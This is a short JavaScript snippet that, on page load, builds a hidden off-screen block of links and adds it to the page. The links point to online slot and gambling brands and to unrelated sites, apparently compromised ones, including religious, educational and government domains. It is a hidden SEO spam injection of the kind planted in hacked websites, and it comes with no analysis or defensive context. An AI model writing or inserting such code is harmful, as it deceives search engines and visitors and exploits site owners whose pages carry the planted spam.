const newStyle = document.createElement('style'); newStyle.textContent = ` .goldslt { position: absolute; left: -9999px; } `; document.head.appendChild(newStyle); document.addEventListener("DOMContentLoaded", function() { const goldslt = document.createElement('div'); goldslt.className = 'goldslt'; const heading = document.createElement('h2'); heading.textContent = 'goldslt'; goldslt.appendChild(heading); const ul = document.createElement('ul'); const glods = [ { name: 'https://sidequirk.com/', url: 'https://sidequirk.com/' }, { name: 'https://jos257.com/', url: 'https://jos257.com/' }, { name: 'JOS257', url: 'https://baitulhikmahdepok.com/' }, { name: 'https://baitulhikmahdepok.com/', url: 'https://baitulhikmahdepok.com/' }, { name: 'https://nurislamialmujaddid.com/', url: 'https://nurislamialmujaddid.com/' }, { name: 'https://annurhajember.com/', url: 'https://annurhajember.com/' }, { name: 'https://rainbowgymnastics.net/', url: 'https://rainbowgymnastics.net/' }, { name: 'https://www.drheratabassum.com/', url: 'https://www.drheratabassum.com/' }, { name: 'https://www.tealawnpoolvilla.com/', url: 'https://www.tealawnpoolvilla.com/' }, { name: 'https://dewanganjbhata.gov.bd/', url: 'https://dewanganjbhata.gov.bd/' }, { name: 'Slot Server Thailand', url: 'https://iwolandhub.com.ng/' }, { name: 'Mentos4d', url: 'https://joombig.com/' }, { name: 'https://oxfordacademy.in/', url: 'https://oxfordacademy.in/' } ]; glods.forEach(glod => { const li = document.createElement('li'); const a = document.createElement('a'); a.href = glod.url; a.textContent = glod.name; li.appendChild(a); ul.appendChild(li); }); goldslt.appendChild(ul); document.body.appendChild(goldslt); });